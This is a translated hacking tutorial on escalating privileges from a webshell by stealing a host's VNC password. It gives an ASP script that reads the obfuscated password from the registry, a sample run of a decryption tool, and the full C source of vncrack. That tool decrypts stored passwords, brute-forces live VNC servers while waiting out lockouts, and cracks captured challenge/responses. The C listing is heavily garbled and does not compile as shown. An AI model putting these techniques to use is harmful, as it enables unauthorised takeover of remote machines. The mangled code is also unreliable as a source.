Author: Xiaohua
In many cases, privilege escalation is done through Serv-U or by finding the SA account password. VNC is another candidate: it usually runs with the highest privileges and provides a graphical interface, so its function is similar to that of a remote terminal.
If you get the webshell of a host and want to improve the permission and find that the host runs the VNC service, you can use the following method.
By default, the VNC Server stores its password in the registry; this document applies only to that case.
First, read the encrypted password in the registry using ASP, and then use a cracking tool to crack the password.
I will give you an ASP script that reads the VNC password. By default, the VNC password is stored under hkcu\software\orl\winvnc3\Password
' Reads the VNC Server password value from the current user's registry hive
' through the WScript.Shell COM object.  The value is the 8-byte obfuscated
' form that the vncrack tool below decrypts with a fixed key, so read access
' to this key is equivalent to knowing the password: protect the key with
' registry ACLs (and do not run the service with elevated rights) rather than
' relying on the obfuscation.
Set wshshell = server. Createobject ("wscript. Shell ")
Bkey = wshshell. regread ("hkcu/software/orl/winvnc3/password ")
' Print each element of the value as hexadecimal; no separator is written,
' so the reader has to split the output into byte pairs.
For each STR in bkey
Response. Write hex (STR)
Next
The result is a sequence of hexadecimal bytes such as 49 40 15 F9 A3 5E 8B 22. This is the VNC-encrypted password, and it can be decoded with vncx4. vncx4 is easy to use: simply enter
C:/> vncx4-W
Then enter the hexadecimal bytes in order. A newline after each byte is not required; the bytes can simply be typed in sequence. For example, here is a test run:
H:/tool> vncx4-W
49
40
15
F9
A3
5E
8b
22
Entered hex string: 49 40 15 F9 A3 5E 8B 22
VNC password 123456
The source code of this tool is given below, and the compiled program is at the bottom.
/* Project code: vncrack for Windows (vnx4)
*
* FX <fx@phenoelit.de>
* Phenoelit (http://www.phenoelit.de /)
* (C) 2 K
*
* Blocking delay idea by stonneway.
*/
# Include
# Include
# Include
File: // # include
# Include
# Include "d3des. H"
# Include "vncauth. H"
/* 8-byte DES key declared outside this file (see the d3des/vncauth headers
   above); interactive() decrypts the registry value with it. */
Extern unsigned char fixedkey [8];
# Define Splash "vncrackx4-by phenoelit (http://www.phenoelit.de/)/n"
/* verbose: number of -v options (0 = quiet, >1 = protocol dumps).
   lbf is not referenced anywhere in this listing. */
Int verbose = 0, lbf = 0;
/* Hex strings of an intercepted challenge (-c) and response (-r);
   both stay NULL unless the offline mode is requested. */
Char * schallange = NULL, * sresponse = NULL;
Void interactive (void );
Void cr_crack (char * wordlist );
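/*
 * Allocate and zero `size` bytes.  Callers in this file never check the
 * result, so allocation failure is reported on stderr and the process exits
 * instead of returning NULL.
 *
 * size: number of bytes to allocate.
 * Returns a pointer to zero-filled storage that the caller frees; never NULL.
 */
void *sec_malloc(size_t size) {
    /* calloc() zero-fills, replacing the malloc()+memset() pair. */
    void *p = calloc(1, size);
    if (p == NULL) {
        /* %zu is the conversion for size_t; %d with a size_t argument is
           undefined behaviour. */
        fprintf(stderr, "malloc() failed for %zu bytes\n", size);
        exit(-1);
    }
    return p;
}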
/*
 * Print the command-line help to stdout and exit with status -1.
 * Never returns.  The option letters listed here must be kept in sync with
 * the switch in main(); this transcription is garbled ('\' shown as '/',
 * option list partly lost), so the text should be checked against the
 * original source before reuse.
 */
Void usage (void ){
Printf ("vncrackx4/N"
"By phenoelit (http://www.phenoelit.de/)/n "/
"Usage:/N"
"Online:./vncrack-H target.host.com-W wordlist.txt [-oPt's]/n"
"Windows Interactive Mode:./vncrack-W/N"
"/Tenter hex key one byte per line-find it in/N"
"/T // HKEY_CURRENT_USER // software // orl // winvnc3 // password or/N"
"/T // HKEY_USERS //. Default // software // orl // winvnc3 // password/n"
"Options for online mode:/N"
"-V/tverbose (Repeat-V for more)/n"
"-P/tconnect to port P instead of 5900/N"
"Options for phoss intercepted challages:/N"
"-C/tchallange from phoss output/N"
"-R/tresponse from phoss output/N"
);
Exit (-1 );
}
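/*
 * Busy-wait for `ms` milliseconds using GetTickCount().
 *
 * The elapsed time is computed as an unsigned difference, which stays
 * correct across the 32-bit tick counter wrap-around (about every 49.7
 * days); the original `now < t1 + ms` comparison would either end at once
 * or spin far too long when t1 + ms wraps.  This still burns a CPU core
 * for the whole delay, as the original did.
 *
 * ms: delay in milliseconds.
 */
void sleep(DWORD ms) {
    DWORD t1 = GetTickCount();
    while (GetTickCount() - t1 < ms) {
        /* spin */
    }
}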
/*
 * Entry point.
 *
 * NOTE(review): this listing is a mangled transcription (identifiers
 * re-capitalised, '\' rendered as '/', the '<' in loop conditions lost);
 * it does not compile as shown, and the comments below describe the intent.
 *
 * Parses the command line, then either hands the intercepted
 * challenge/response to cr_crack() (offline mode, which exits) or runs the
 * online mode: for every line of the wordlist it opens a new TCP connection
 * to the server, echoes the protocol-version banner, sends the 16-byte
 * challenge encrypted with the candidate and inspects the 4-byte result.
 * Every candidate is therefore a separate connection and a separate failed
 * authentication, which is what the server's blocking logic -- and any
 * connection logging on the server side -- keys on.
 *
 * Returns 0 only when the wordlist is exhausted; every other path exit()s.
 */
Int main (INT argc, char ** argv ){
Int SFD;/* socket */
Unsigned long dest_ip;
Struct sockaddr_in dest_addr;
Char * rbuf;
Unsigned char Atype [4];
Unsigned char challange [16];
Char * vnchost = NULL;
U_short vncport = 5900;
Int I, Ani = 0;
Char * wordlist = NULL;
File * FD;
Char * tryword;
Char servertext [255];
Char * sthelp;
Int conwait = 90;
Int redocount = 0;
/* Seconds to wait after the server closes the connection before retrying;
   Ani and conwait above are not referenced anywhere in this listing. */
Int redosleep = 10;
/* Check the command line options */
/* The loop header lost its "< argc" comparison in transcription. */
For (I = 1; I switch (argv [I] [1]) {
Case 'V': // verbose
Verbose ++;
Break;
Case 'p ':
If (argv [++ I] = NULL) usage ();
If (vncport = atoi (argv [I]) = 0 ){
Fprintf (stderr, "wrong port number: % s/n", argv [I]);
Exit (-1 );
}
Break;
Case 'H ':
If (argv [++ I] = NULL) usage ();
Vnchost = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (vnchost, argv [I]);
Break;
Case 'W ':
If (argv [++ I] = NULL) usage ();
Wordlist = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (wordlist, argv [I]);
Break;
/* Two cases share the letter 'W' and two share 'r' in this transcription;
   the original distinguished them by case. interactive() exits. */
Case 'W ':
Interactive ();
Break;
Case 'C ':
If (argv [++ I] = NULL) usage ();
Schallange = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (schallange, argv [I]);
Break;
Case 'r ':
If (argv [++ I] = NULL) usage ();
Sresponse = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (sresponse, argv [I]);
Break;
Case 'r ':
If (argv [++ I] = NULL) usage ();
Redosleep = atoi (argv [I]);
Break;
Default:
Usage ();
}
}
/* Offline mode: a challenge or response was given.  cr_crack() exits. */
If (schallange | sresponse ){
Printf (splash );
Cr_crack (wordlist);/* exit is done here */
}
/* Online mode needs a host and a wordlist; the port defaults to 5900. */
If (! (Vnchost & vncport & wordlist) usage ();
Printf (splash );
/* Host */
/* inet_addr() accepts dotted-quad addresses only and its failure value
   (INADDR_NONE) is never checked, so the hostname form shown in usage()
   silently becomes a connect() to an invalid address. */
Dest_ip = inet_addr (vnchost );
Memcpy (& dest_addr.sin_addr, & dest_ip, sizeof (dest_ip ));
Dest_addr.sin_port = htons (vncport );
Dest_addr.sin_family = af_inet;
/* Make sure we can talk Winsock
Comment: I like to enclose this, because it is so ugly */
{
Word wversionrequested;
Wsadata;
Int err;
Wversionrequested = makeword (1, 1 );
Err = wsastartup (wversionrequested, & wsadata );
If (Err! = 0 ){
Fprintf (stderr, "unable to start networking ");
Exit (-1 );
}
} // WSA and go
/* Text mode: fgets() below returns each line with its trailing newline. */
If (FD = fopen (wordlist, "RT") = NULL ){
Fprintf (stderr, "unable to open wordlist % s/n", wordlist );
Exit (-1 );
}
Tryword = sec_malloc (256 );
/* One full connection per candidate word. */
While (fgets (tryword, 255, FD )! = NULL ){
/* Cut the word */
If (tryword [strlen (tryword)-1] = '/N') tryword [strlen (tryword)-1] ='/0 ';
/* Re-entered from the "connection close" case below after sleeping. */
Redoclosed:
If (verbose ){
Printf ("/ntrying '% s'...", tryword );
Fflush (stdout );
}
If (SFD = socket (af_inet, sock_stream, 0) = invalid_socket ){
Fprintf (stderr, "unable to get a socket ");
Exit (-1 );
}
If (connect (SFD, (struct sockaddr *) & dest_addr, sizeof (dest_addr ))! = 0 ){
Fprintf (stderr, "Connect failed (% d)./N", wsagetlasterror ());
Exit (-1 );
}
/* Connunication starts with server-> Client Version packet */
/* rbuf is allocated on every pass and never freed (100 bytes leaked per
   candidate).  Only the zero-fill from sec_malloc() terminates the banner
   for strlen() below, which is not guaranteed if the server sends 100 bytes. */
Rbuf = sec_malloc (100 );
If (Recv (SFD, rbuf, 100,0) <0 ){
Fprintf (stderr, "Recv ()");
Exit (-1 );
}
If (verbose> 1) printf ("/nserver Protocol Version: % s", rbuf );
/* Bounce this message back-so the server will continue */
If (send (SFD, rbuf, strlen (rbuf), 0) <0 ){
Fprintf (stderr, "Send ()");
Exit (-1 );
}
/* 4-byte security-type word; only its last byte is examined below. */
If (Recv (SFD, Atype, sizeof (Atype), 0) <0 ){
Fprintf (stderr, "Recv ()");
Exit (-1 );
}
If (verbose> 1 ){
Printf ("authentication type :");
For (I = 0; I <4; I ++) {printf ("% x", Atype [I]);}
Printf ("/N ");
}
/* 0 = server refused (reason text follows), 1 = no authentication,
   2 = VNC authentication; anything else is unsupported. */
Switch (Atype [3]) {
Case 0:
Fprintf (stderr, "server told me: connection close/N ");
If (verbose ){
// Try to retrieve the reason
Memset (servertext, 0, sizeof (servertext ));
If (Recv (SFD, servertext, sizeof (servertext), 0) <0 ){
Fprintf (stderr, "Recv () in verbose ");
Exit (-1 );
} Else {
/* Skip the 4-byte length prefix; the text is not bounds-checked
   against the length the server declared. */
Sthelp = servertext;
Sthelp + = 4;
Fprintf (stderr, "server says: % s/n", sthelp );
}
/* The server is blocking repeated failures: wait redosleep seconds and
   retry the same word, giving up after three attempts.  Note the retry
   happens only when verbose is set -- the whole block is inside
   if (verbose); otherwise the refusal is fatal immediately. */
If (verbose) printf ("/twaiting for blocking disable/N ");
Sleep (redosleep * 1000 );
If (redocount ++) <3 ){
Goto redoclosed;
} Else {
Fprintf (stderr, "/tgiving up (increase-R)/n ");
}
}
Exit (-1 );
Break;/* not reached */
Case 1:
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Server does not require authentication! /N"
">>>>>>>>>>>>>>>/N ");
Exit (-1 );
Break;/* not reached */
Case 2:
If (verbose> 1)
Printf ("authentication type 'vnc authentication '-fine/N ");
Break;
Default:
Fprintf (stderr, "unknown authentication requested by server/N ");
Exit (-1 );
}
Redocount = 0;
/* 16-byte challenge from the server. */
If (Recv (SFD, challange, sizeof (challange), 0) <0 ){
Fprintf (stderr, "Recv ()");
Exit (-1 );
}
If (verbose> 1 ){
Printf ("challange :");
For (I = 0; I <16; I ++) {printf ("% x", challange [I]);}
Printf ("/N ");
}
/* Encrypt challange with password and send this fuck to the server */
Vncencryptbytes (challange, tryword );
If (send (SFD, challange, sizeof (challange), 0) <0 ){
Fprintf (stderr, "auth send ()");
Exit (-1 );
}
/* Clear the examined byte before reading the 4-byte result word. */
AType [3] = 0;
If (Recv (SFD, Atype, sizeof (Atype), 0) <0 ){
Fprintf (stderr, "auth Recv ()");
Exit (-1 );
}
/* 0 = accepted, 1 = rejected, 2 = too many failures (server throttling). */
Switch (Atype [3]) {
Case 0:
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N", tryword );
Free (tryword );
Exit (0 );
Break;/* not reached */
Case 1:/* 'normal' failed */
If (verbose) printf ("failed/N ");
Break;
Case 2:/* too then */
Printf ("server is angry, waiting for calm down.../N ");
Sleep (10000 );
Break;
Default:
Fprintf (stderr, "unknown response/N ");
Exit (-1 );
}
/* Close this attempt's connection and clear the candidate buffer. */
Shutdown (SFD, 2 );
Closesocket (SFD );
Memset (tryword, 0,256 );
}
Free (tryword );
Fclose (FD );
Return 0;
}
/*
 * Windows interactive mode (-W): read the 8 bytes of the registry value as
 * hexadecimal numbers (scanf() accepts any whitespace between them) and
 * decrypt them with the fixed key.  Exits with 0; never returns.
 *
 * NOTE(review): scanf("%x") stores an unsigned int, but C is a single char,
 * so every call writes past C on the stack (undefined behaviour); the
 * scanf() result is also never checked, so non-hex input leaves C unchanged.
 * The buffer is 9 zero-filled bytes, which is what terminates it for the
 * final "%s".  The two d3des calls are garbled in this transcription.
 */
Void interactive (void ){
Unsigned char * pass;
Int I;
Char C;
Pass = (char *) sec_malloc (9 );
For (I = 0; I <8; I ++ ){
Scanf ("% x", & C );
Pass [I] = C;
}
Printf ("entered hex string :");
For (I = 0; I <8; I ++) {printf ("% x", pass [I]);}
Printf ("/N ");
/* Set the fixed key for decryption, then decrypt the 8 bytes in place. */
Specified ey (fixedkey, de1 );
Des (Pass, pass );
Printf ("VNC password: % s/n", pass );
Exit (0 );
}
/*
 * Offline mode: given a challenge and a response captured from a session
 * (-c/-r, 32 hex characters each), try every wordlist entry and then every
 * string of 1..8 characters from cset1 until encrypting the challenge with
 * the candidate reproduces the response.  Exits in all cases; never returns.
 *
 * wordlist: path of the wordlist file; NULL is rejected.
 *
 * NOTE(review): this transcription lost the '<' comparisons and closing
 * parentheses of the loop headers below; each `For (CNT [k] = 0; CNT [k] ...`
 * line is one loop over the cset1_len positions of cset1.
 */
Void cr_crack (char * wordlist ){
Int I, J;
/* Length of the challenge/response in bytes. */
# Define CRL 16
Char chlorophyll [CRL + 1];
Char RSP [CRL + 1];
Char tchlorophyll [CRL + 1];
Char ts [3];
File * FD;
Char * tryword;
Char BFT [9];
/* The literal is garbled in this transcription; cset1_len must equal the
   number of characters actually present, or the loops index past it. */
Char cset1 [] =
"Abcdefghijklmnopqrstuvwxyz"
"Abcdefghijklmnopqrstuvwxyz"
"1234567890! /"$ % &/() =? ''' * _:;-., # +}] [{^ <> Success/0 ";
# Define cset1_len (92)
Int CNT [8];
Time_t T1, T2;
If (! Wordlist ){
Fprintf (stderr, "supply wordlist file! ");
Exit (-1 );
}
If ((! Schallange) | (! Sresponse )){
Usage ();
}
If (
(Strlen (schallange )! = 16*2)
| (Strlen (sresponse )! = 16*2)
){
Fprintf (stderr,
"Challange and response have to be 32 characters each/N ");
Exit (-1 );
}
Memset (& chlorophyll, 0, CRL + 1 );
Memset (& tchlorophyll, 0, CRL + 1 );
Memset (& RSP, 0, CRL + 1 );
Memset (& TS, 0, 3 );
J = 0;
/* Parse both hex strings two characters at a time.  strtol() is not
   checked, so a non-hex pair silently becomes 0. */
For (I = 0; I strncpy (TS, & schallange [J], 2 );
Chlorophyll [I] = (unsigned char) strtol (TS, null, 16 );
Strncpy (TS, & sresponse [J], 2 );
RSP [I] = (unsigned char) strtol (TS, null, 16 );
J + = 2;
}
If (verbose ){
Printf ("challange :");
For (I = 0; I printf ("% x", (unsigned char) Chlorophyll [I]);
}
Printf ("/N ");
Printf ("response :");
For (I = 0; I printf ("% x", (unsigned char) RSP [I]);
}
Printf ("/N ");
}
If (FD = fopen (wordlist, "RT") = NULL ){
Fprintf (stderr, "cocould not open wordlist/N ");
Exit (-1 );
}
Tryword = sec_malloc (256 );
While (fgets (tryword, 255, FD )! = NULL ){
/* Unconditionally drops the last character, unlike main(), which checks
   for the newline first: the final line of a wordlist without a trailing
   newline loses its last character here. */
Tryword [strlen (tryword)-1] = '/0 ';
/* Try this word */
/* Work on a copy; the encryption modifies its buffer in place. */
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, tryword );
If (verbose> 1 ){
For (I = 0; I printf ("% x", (unsigned char) RSP [I]);
}
Printf ("/N ");
For (I = 0; I printf ("% x", (unsigned char) tchlorophyll [I]);
}
Printf ("/N ");
}
If (! Memcmp (tchlorophyll, RSP, CRL )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N", tryword );
Free (tryword );
Exit (0 );
} Else {
If (verbose) printf ("% s failed/N", tryword );
}
Memset (tryword, 0,256 );
}
Fclose (FD );
Free (tryword );
/* Exhaustive search: eight nested "depth" levels, each adding one more
   position of BFT drawn from cset1.  The levels are textual copies of each
   other; only the nesting depth and the NUL terminator position change. */
Printf ("-----------------------------------/N"
"Wordlist failed-going brute force/N"
"-----------------------------------/N ");
T1 = gettickcount ();
BFT [8] = '/0 ';
BFT [1] = '/0 ';
Printf ("/tdepth I/N ");
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
BFT [2] = '/0 ';
Printf ("/tdepth II/N ");
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
/************/
BFT [3] = '/0 ';
Printf ("/tdepth III/N ");
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
/************/
BFT [4] = '/0 ';
Printf ("/tdepth IV/N ");
For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
/************/
BFT [5] = '/0 ';
Printf ("/tdepth V/N ");
For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];
For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
/************/
BFT [6] = '/0 ';
Printf ("/tdepth VI/N ");
For (CNT [5] = 0; CNT [5] BFT [5] = cset1 [CNT [5];
For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];
For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
} File: // 5
/************/
BFT [7] = '/0 ';
Printf ("/tdepth VII/N ");
For (CNT [6] = 0; CNT [6] BFT [6] = cset1 [CNT [6];
For (CNT [5] = 0; CNT [5] BFT [5] = cset1 [CNT [5];
For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];
For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
} File: // 5
} File: // 6
/************/
BFT [8] = '/0 ';
Printf ("/tdepth VIII/N ");
For (CNT [7] = 0; CNT [7] BFT [7] = cset1 [CNT [7];
For (CNT [6] = 0; CNT [6] BFT [6] = cset1 [CNT [6];
For (CNT [5] = 0; CNT [5] BFT [5] = cset1 [CNT [5];
For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];
For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];
If (verbose)
Printf ("try: % s/n", BFT );
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
} File: // 5
} File: // 6
} File: // 7
/* T1/T2 are time_t but hold GetTickCount() milliseconds.  The elapsed
   value is integer-divided by an unexplained constant (63) and then passed
   for a floating-point conversion, which is undefined behaviour; the
   conversion itself is garbled in this transcription. */
T2 = gettickcount ();
Printf ("depth VIII (% 1274f WPS)/n", (t2-t1)/63 );
Printf ("not in character set! /N ");
Exit (0 );
}